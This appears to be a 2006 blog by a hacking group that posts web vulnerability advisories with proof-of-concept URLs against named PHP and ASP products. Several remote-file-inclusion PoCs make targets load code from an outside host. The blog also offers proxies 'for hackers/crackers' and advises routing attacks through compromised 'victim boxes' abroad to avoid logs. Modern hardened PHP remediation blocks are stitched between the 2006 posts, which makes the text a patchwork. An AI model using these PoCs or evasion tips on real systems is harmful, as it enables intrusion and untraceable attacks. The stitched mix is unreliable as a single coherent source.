by r0t, der4444, cembo, VietMafia

Monday, May 29, 2006

DGNews v 1.5 File Upload Vuln.

###############################################
Vuln. discovered by : r0t
Date: 29 may 2006
vendor:www.diangemilang.com/dgscripts.php
affected versions:v 1.5 and prior
###############################################


Vuln. Description:

Due to improper checks of file extensions in admin/upprocess.php it is possible to upload arbitrary files to the "img" directory. This can e.g. be exploited to upload and execute malicious PHP scripts.


Note: successful exploitation requires access to the administration section.

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/
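As an added example (not DGNews code), this is the kind of upload handler an admin/upprocess.php should use in place of a loose extension check; the target directory, field name and allowed types are assumptions:

```php
<?php
// Added example (not DGNews code): a hardened replacement for an upload
// handler like admin/upprocess.php. Directory and field names are assumptions.
declare(strict_types=1);

const UPLOAD_DIR  = __DIR__ . '/../img';                 // assumed target directory
const ALLOWED_EXT = ['jpg' => 'image/jpeg', 'jpeg' => 'image/jpeg',
                     'png' => 'image/png',  'gif'  => 'image/gif'];
const MAX_BYTES   = 2 * 1024 * 1024;

/**
 * Validate one entry of $_FILES and return a safe destination filename, or throw.
 * The original filename is never reused: the server picks both the name and the
 * extension, so "shell.php", "shell.php.jpg" or "x.PhP" cannot end up executable
 * inside img/.
 */
function validateUpload(array $file): string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        throw new RuntimeException('upload failed');
    }
    if ($file['size'] > MAX_BYTES || !is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('bad upload');
    }
    // Extension check on the LAST extension only, case-insensitive, against an
    // allow-list (never a deny-list of ".php", ".phtml", ...).
    $ext = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));
    if (!isset(ALLOWED_EXT[$ext])) {
        throw new RuntimeException('extension not allowed');
    }
    // Content check: the detected MIME type must match the claimed extension.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    if ($mime !== ALLOWED_EXT[$ext]) {
        throw new RuntimeException('content does not match extension');
    }
    // The file must also decode as an image.
    if (@getimagesize($file['tmp_name']) === false) {
        throw new RuntimeException('not an image');
    }
    return bin2hex(random_bytes(16)) . '.' . $ext;
}

function handleUpload(): void
{
    $name = validateUpload($_FILES['userfile'] ?? []);   // assumed field name
    $dest = UPLOAD_DIR . '/' . $name;
    if (!move_uploaded_file($_FILES['userfile']['tmp_name'], $dest)) {
        throw new RuntimeException('could not store file');
    }
    chmod($dest, 0644);
    echo 'stored as ' . htmlspecialchars($name, ENT_QUOTES, 'UTF-8');
}
```

Pair this with a web-server rule that never executes scripts from the upload directory (for Apache with mod_php, `php_flag engine off` in that directory), so a check that is bypassed later still does not yield code execution.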

Saturday, May 27, 2006

proxy&socks 4 hackers/crackers


EVA-Web <=2.1.2 vuln.

###############################################
Vuln. discovered by : r0t
Date: 27 may 2006
vendor:http://spip-edu.edres74.net/
affected versions:2.1.2 and prior
###############################################

Vuln. Description:

EVA-Web contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to the "debut_image" parameter in "article-album.php3", the "date" parameter in "rubrique.php3", and the "perso" and "aide" parameters isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

examples:

/article-album.php3?id_article=39&debut_image=[XSS]
/rubrique.php3?id_rubrique=29&date=[XSS]
/?perso=[XSS]
/?aide=[XSS]


Additionally, the same two parameters disclose the full installation path:
/?perso=full path
/?aide=full path


###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

Friday, May 26, 2006

Daily real elite socks&proxys

For today I will give some Brazil proxies.
As you know, even if you think that your victim box which you use for tunnelling or just as a proxy server is located in the USA and doesn't make logs, you can never be sure about honeys or other presents*, so better use some third-world countries.


Wednesday, May 24, 2006

eSyndicat Directory Software - Local File Inclusion

============================
discovered by : VietMafia
developer's site: www.esyndicat.com
script: eSyndicat Directory Software 1.2
risk: moderate
status: unpatched
============================

This script has a vuln which can be exploited by malicious people to disclose sensitive information and potentially compromise a vulnerable system.

Input passed to the "path_to_config" parameter in admin/cron.php isn't properly verified before it is used to include files. This can be exploited to include arbitrary files from local resources.

example:

http://host/path/admin/cron.php?path_to_config=file%00

Successful exploitation requires that "register_globals" is enabled and that "magic_quotes_gpc" is disabled.

Saturday, May 20, 2006

PMB 0.1

Details Here

.LV Elite Socks/Proxies 4 today


Get more by requesting them on board.

Friday, May 19, 2006

Satanic Socks Server v0.66.170506

Get it

Sunday, May 14, 2006

PopPhoto - Remote File Inclusion Vuln

=================================
script: PopPhoto 3.5.4 and below
risk: critical
status: unpatched
discovered by: VietMafia
=================================

Vuln. Description:

This flaw is due to an input validation error in "resources/includes/popp.config.loader.inc.php" (line 25) that does not validate the "cfg['popphoto_base_path']" variable properly. Remote attackers can include malicious scripts and execute arbitrary commands with the privileges of the web server.

PoC:

http://[target]/[path]/resources/includes/popp.config.loader.inc.php?include_path=http://unsecured-systems.com/forum/

Sorry all, I'm still travelling so I don't have much time to contribute :) I will be back very soon.

Saturday, May 13, 2006

FlexChat XSS

###############################################
Vuln. discovered by : r0t (Pridels Sec Crew)
Date: 13 may 2006
vendorlink:http://www.flexchat.net/
affected versions:v.2.0 and prior
###############################################


Vuln. Description:

FlexChat contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to the "username" and "CFTOKEN" parameters in "index.cfm" and input passed to the "CFTOKEN" and "CFID" parameters in "chat.cfm" isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.


###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

Monday, May 08, 2006

still relaxing.

I said that I would not post, but as you see it was difficult not to spend 3 minutes on another vuln. report/advisory.
In that "holiday" time I checked mail/blog a few times and got a smile on my face because of some persons.

One of those nice persons is a "wannabe hacker", ReZEN from XOR Crew.
After I published the Albinator vuln in the blog (the advisory had long been posted by VietMafia on our board), ReZEN exploded with his geniality. Starting with adding lame comments and ending with "nice greetings" in his next advisories.
As he supposed that his advisories are more usable than mine or ours...
OK. Let me edit that ...
First you must see that the difference between us is too big, cauz I don't think that I'm a great hacker or any type of hacker, and I post vulns cauz that must be done from my view and just for a global insecure report.
But look at you, you are a hard-working wannabe hax0r; for you each advisory is one more step towards your fame as a great hax0r.
And even though those "nice greetings" are absolutely lame, I know it is a good try to get more fame; don't your advisories give you enough fame on the defacers scene?
Forget that I will post your nickname or your crew name in my vuln. reports just to work for your fame.
And about Albinator, it was audited by VietMafia, so credits go to him.. mine was just the XSS add.
So about Pridels Sec Crew, I don't think that somebody from those guys did something to you or your crew, but if you don't think like me, then the only person who can be attacked by lames like you is me, so you have already forgotten about the other guys; your target is me.
All your "nice greetings" address directly to me; I will always be glad to see your nice work:)

To all others, I'm still chillin' in lovely Latvia and enjoying ice hockey, but I'll be back soon, cauz it looks like my favourite team will not get what they really deserve.

Creative Community Portal vuln.

###############################################
Vuln. discovered by : r0t (Pridels Sec Crew)
Date: 8 may 2006
vendor:www.creative-software.co.uk/community2.html
affected versions:1.1 and prior
###############################################


Vuln. Description:


Creative Community Portal contains multiple flaws that allow remote SQL injection attacks. Input passed to the "forum_id" parameter in "DiscView.php" and "Discussions.php", to the "article_id" parameter in "ArticleView.php", to the "event_id" parameter in "EventView.php", to the "answer_id" and "AddVote" parameters in "PollResults.php", and to the "mid" parameter in "DiscReply.php" isn't properly sanitised before being used in a SQL query.
Input passed to the "prod_id" parameter in "cart.php" and "product_info.php" isn't properly sanitised before being used in a SQL query.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.


examples:

/ArticleView.php?article_id=[SQL]
/DiscView.php?mid=144&forum_id=[SQL]
/Discussions.php?forum_id=[SQL]
/EventView.php?event_id=[SQL]
/PollResults.php?answer_id=32&AddVote=[SQL]
/PollResults.php?answer_id=[SQL]
/DiscReply.php?forum_id=1&mid=[SQL]


###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

Thursday, May 04, 2006

Defaced e-zine

Defaced issue 0x09

0x00 >< content
0x01 >< introduction
0x02 >< news
0x03 >< mailmanz bag
0x04 >< sparc virii
0x05 >< static libc calls hook
0x06 >< monster in my pocket
0x07 >< choose life
0x08 >< death industry
0x09 >< pdp 11 part 1
0x0a >< pdp 11 part 2
0x0b >< tits hacking tricks
0x0c >< outro


Download

Issues 1 - 8:

Defaced issue 0x01
Defaced issue 0x02
Defaced issue 0x03
Defaced issue 0x04
Defaced issue 0x05
Defaced issue 0x06
Defaced issue 0x07
Defaced issue 0x08

Wednesday, May 03, 2006

albinator <= 2.0.8 Remote File Inclusion & XSS vuln

###############################################
Vuln. discovered by :VietMafia & r0t (Pridels Sec Crew)
Date: 3 may 2006
vendor:http://www.albinator.com/
affected versions:2.0.8 and prior
###############################################



Vuln. Description:


1. Remote File Inclusion Vuln.

Input passed to the "Config_rootdir" parameter in "eday.php", "eshow.php" and "forgot.php" isn't properly verified before it is used to include files. This can be exploited to include arbitrary files from external and local resources.


example code :

$dirpath = "$Config_rootdir";
require_once($dirpath."essential/dbc_essential.php");
require_once($dirpath."essential/globalfunctions.php");


this can lead to remote file include.


example PoC:

http://victim/eshow.php?Config_rootdir=http://evilcode.php




2. cross-site scripting attack vuln.

Input passed to the "cid" parameter in dlisting.php and to the "preloadSlideShow" parameter in showpic.php is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.


examples:


/dlisting.php?cid=1[XSS]

/showpic.php?aid=21&uuid=175&pid=172&slide_show=1&slide_show_secs=0&preloadSlideShow=[XSS]


###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

phpBB auction mod - Remote File Inclusion Vuln

===================================
developer's site: http://www.phpbb-auction.com
script: Auction mod for phpBB
risk: critical
status: unpatched
discovered by: VietMafia
===================================

Vuln. Description:

This flaw is due to an input validation error in "aution\auction_common.php" (line 26) that does not validate the "$phpbb_root_path" variable properly. Remote attackers can include malicious scripts and execute arbitrary commands with the privileges of the web server.

PoC:

http://[target]/[path]/aution\auction_common.php?phpbb_root_path=http://unsecured-systems.com/forum/

===================================
have a good time all my friends
===================================
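The eSyndicat, PopPhoto, albinator and phpBB auction mod advisories above all describe the same pattern: a root-path variable that can be filled from the request is concatenated into require_once. As an added example (not code from any of those projects), this shows the pattern next to a hardened form; the file names under essential/ are taken from the albinator snippet and everything else is assumed:

```php
<?php
// Added example (not code from albinator, PopPhoto, phpBB auction mod or
// eSyndicat): the include pattern those advisories describe, and a hardened form.
declare(strict_types=1);

// --- vulnerable pattern (as quoted in the albinator advisory) ---
// With register_globals=On, $Config_rootdir is filled straight from the query
// string, so ?Config_rootdir=http://... (RFI) or ?path_to_config=../x%00 (LFI)
// decides what gets included:
//
//   $dirpath = "$Config_rootdir";
//   require_once($dirpath."essential/dbc_essential.php");

// --- hardened form ---
// 1. Never derive the application root from request data; anchor it to the
//    location of the script itself.
define('APP_ROOT', realpath(__DIR__));

/**
 * Resolve an include relative to APP_ROOT and refuse anything that leaves it.
 * Rejects NUL bytes (the %00 truncation trick), URL/stream wrappers
 * (http://, ftp://, php://, data:, ...) and ../ escapes, independently of
 * whether allow_url_include / allow_url_fopen happen to be Off.
 */
function safeIncludePath(string $relative): string
{
    if ($relative === '' || strpos($relative, "\0") !== false) {
        throw new InvalidArgumentException('invalid path');
    }
    if (preg_match('#^[a-z][a-z0-9+.\-]*:#i', $relative)) {   // any scheme prefix
        throw new InvalidArgumentException('remote/stream paths refused');
    }
    $full = realpath(APP_ROOT . '/' . ltrim($relative, '/\\'));
    if ($full === false || strpos($full, APP_ROOT . DIRECTORY_SEPARATOR) !== 0) {
        throw new InvalidArgumentException('path escapes application root');
    }
    if (substr($full, -4) !== '.php') {
        throw new InvalidArgumentException('only .php includes are allowed');
    }
    return $full;
}

// 2. The includes an application needs are a fixed list, so spell them out;
//    nothing from $_GET/$_POST ever reaches require_once.
require_once safeIncludePath('essential/dbc_essential.php');
require_once safeIncludePath('essential/globalfunctions.php');
```

The configuration side of the same defence is register_globals=Off (the directive was removed entirely in PHP 5.4) and allow_url_include=Off in php.ini; the code fix is what protects an installation where those settings are not under the application's control.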

Monday, May 01, 2006

ice hockey 2006 @Riga


On 5.05 the ice hockey world championship will start in Riga/Latvia, so to relax with watching hockey and to meet my friends from there, and of course tasty beer+blond chicks...:)
I will take holidays and will go there...I think it's possible that cembo also goes there..
So, that means that you can relax from my vuln. reports for 2 weeks.
But I think that VietMafia or der4444 will give some vuln. reports..:)

CyberBuild vuln.

###############################################
Vuln. discovered by : r0t
Date: 1 may 2006
vendorlink:www.smartwin.com.au/cyberbuild.htm
affected versions:last
###############################################

Vuln. Description:

1. SQL injection.

CyberOffice Warehouse Builder contains a flaw that allows remote SQL injection attacks. Input passed to the "SessionID" parameter in "login.asp" and input passed to the "ProductIndex" parameter in "browse0.htm" isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

examples:

/login.asp?SessionID=[SQL]
/browse0.htm?ProductIndex=[SQL]



2. XSS
It also contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to the "SessionID" parameter in "login.asp", input passed to the "ProductIndex" parameter in "browse0.htm" and input passed to the "rowcolor" and "heading" parameters in "/include/result.asp" isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

examples:

/login.asp?SessionID=[XSS]

/browse0.htm?ProductIndex=[XSS]

/include/result.asp?debug=print&cols=3&linecolor=%23AAAAAA&menu=category&body=bodyblue&bold=bodyheading&hlcolor=%2388C4FF&bgcolor=%23E0FFE0&menucolor=%23E0FFE0&hdcolor=%23B0B0B0&idcolor=%23FFFFFF&header=bodywhite&rowcolor=[XSS]

/include/result.asp?debug=print&cols=3&linecolor=%23AAAAAA&menu=category&body=bodyblue&bold=bodyheading&hlcolor=%2388C4FF&bgcolor=%23E0FFE0&menucolor=%23E0FFE0&hdcolor=%23B0B0B0&idcolor=%23FFFFFF&header=bodywhite&rowcolor=%23E0FFE0&row=bodyblack&label=bodyblue&heading=[XSS]

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

SunShop XSS vuln.

###############################################
Vuln. discovered by : r0t
Date: 1 may 2006
vendor:
www.turnkeywebtools.com/index.php/location/products/product/sunshop//
affected versions:3.5 and prior
###############################################

Vuln. Description:

SunShop Shopping Cart contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to the "prevaction", "previd", "prevstart", "itemid", "id" and "action" parameters in "index.php" isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

examples:

/index.php?action=item&id=15&prevaction=[XSS]

/index.php?action=item&id=15&prevaction=category&previd=[XSS]

/index.php?action=item&id=15&prevaction=category&previd=2&prevstart=[XSS]

/index.php?action=sendtofriend&type=item&itemid=[XSS]

/index.php?action=item&id=[XSS]

/index.php?action=[XSS]

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

Avactis Shopping Cart vuln.

###############################################
Vuln. discovered by : r0t
Date: 1 may 2006
vendor:http://www.avactis.com
affected versions:0.1.2 (latest) and prior
###############################################

Vuln. Description:

1. sql inj.

Avactis Shopping Cart contains a flaw that allows remote SQL injection attacks. Input passed to the "category_id" parameter in "store_special_offers.php" and "store.php" isn't properly sanitised before being used in a SQL query.
Input passed to the "prod_id" parameter in "cart.php" and "product_info.php" isn't properly sanitised before being used in a SQL query.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.


examples:

/store_special_offers.php?asc_action=SetCurrCat&category_id=1[SQL]

/cart.php?asc_action=AddToCart&prod_id=1[SQL]

/store.php?asc_action=SetCurrCat&category_id=[SQL]

/product_info.php?asc_action=SetCurrentProduct&prod_id=[SQL]



2. xss

Avactis Shopping Cart contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to the "category_id" parameter in "store.php" and "store_special_offers.php" and input passed to the "prod_id" parameter in "product_info.php" isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

examples:

/store_special_offers.php?asc_action=SetCurrCat&category_id=1[XSS]

/product_info.php?asc_action=SetCurrentProduct&prod_id=[XSS]

/store.php?asc_action=SetCurrCat&category_id=[XSS]


3. Full path disclosure

An attacker performing SQL injection tests will also obtain the full installation path from the resulting error messages.

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/
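The Avactis advisory, like the Creative Community Portal, CyberBuild and SunShop ones above, combines an id parameter used in SQL, the same value echoed back into HTML, and a database error that leaks the install path. As an added example (not code from any of those products), this is a product_info.php-style handler with all three fixed; the table, column and connection details are assumptions:

```php
<?php
// Added example, not Avactis/SunShop/CyberBuild/Creative Community code: a
// product_info.php-style handler that takes an id, queries with it and echoes
// it back, with the SQLi, XSS and path-disclosure fixes. Schema is assumed.
declare(strict_types=1);

// 3. Full path disclosure: errors go to the server log, never to the browser.
ini_set('display_errors', '0');
ini_set('log_errors', '1');

/** Return the query parameter as a positive integer, or null for anything else. */
function intParam(array $query, string $name): ?int
{
    $raw = $query[$name] ?? null;
    // "1 UNION SELECT ...", "1[SQL]", "" and arrays all fail this check.
    return (is_string($raw) && preg_match('/^[1-9][0-9]{0,9}$/', $raw)) ? (int) $raw : null;
}

/** HTML-escape any string before it is placed into a page. */
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

function showProduct(PDO $db, array $query): string
{
    $prodId = intParam($query, 'prod_id');
    if ($prodId === null) {
        http_response_code(400);
        return '<p>Invalid product id.</p>';   // the bad value is not echoed back
    }
    // 1. SQL injection: the id is a bound parameter, never part of the SQL text.
    $stmt = $db->prepare('SELECT name, description FROM products WHERE prod_id = :id');
    $stmt->bindValue(':id', $prodId, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    if ($row === false) {
        http_response_code(404);
        return '<p>No such product.</p>';
    }
    // 2. XSS: every string written into HTML passes through h(), including
    //    database content, which may itself have come from user input.
    return '<h1>' . h($row['name']) . '</h1><p>' . h($row['description']) . '</p>'
         . '<a href="cart.php?asc_action=AddToCart&amp;prod_id=' . $prodId . '">Add to cart</a>';
}

try {
    $db = new PDO('mysql:host=localhost;dbname=shop', 'shop', 'secret', [
        PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
        PDO::ATTR_EMULATE_PREPARES => false,
    ]);
    echo showProduct($db, $_GET);
} catch (Throwable $e) {
    error_log($e->getMessage());      // message contains file paths: log only
    http_response_code(500);
    echo '<p>Internal error.</p>';
}
```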

 
Copyright (c) 2006 Pridels Sec Crew